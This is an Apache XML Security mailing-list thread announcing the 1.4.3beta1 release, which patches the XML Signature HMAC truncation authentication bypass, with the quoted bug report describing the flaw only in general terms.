1.4.3beta1 binary and source distributions (and ASCII-encoded PGP signatures)
are now available at:
http://people.apache.org/~mullan/dist/
Signatures can be verified using the Keys in
http://santuario.apache.org/dist/KEYS
Please let us know ASAP if you find any problems and thanks in advance for
testing! If no issues are found by Friday, this will become the release
candidate for 1.4.3.
Thanks,
Sean
Sean Mullan wrote:
Hi all,
I have just putback a fix for this vulnerability to the source code
repository. This patch will be included in the (Java) version 1.4.3
release. Because of the potential severity of this issue, we are
planning an expedited release process for 1.4.3. I plan to make
available a jar for testing later today and a more complete release
candidate binary tomorrow. If no issues are found then we will call for
a vote later this week and work towards making a final version available
early next week.
Thanks,
Sean
bugzi...@apache.org wrote:
https://issues.apache.org/bugzilla/show_bug.cgi?id=47526
Summary: XML signature HMAC truncation authentication bypass
Product: Security
Version: Java 1.4.2
Platform: All
OS/Version: All
Status: NEW
Severity: critical
Priority: P1
Component: Signature
AssignedTo: security-dev@xml.apache.org
ReportedBy: sean.mul...@sun.com
Apache XML Security (Java) is affected by the vulnerability published in
US-Cert VU #466161. See: http://www.kb.cert.org/vuls/id/466161 for more
information. This bug can allow an attacker to bypass authentication by
inserting/modifying a small HMAC truncation length parameter in the XML
Signature HMAC based SignatureMethod algorithms.
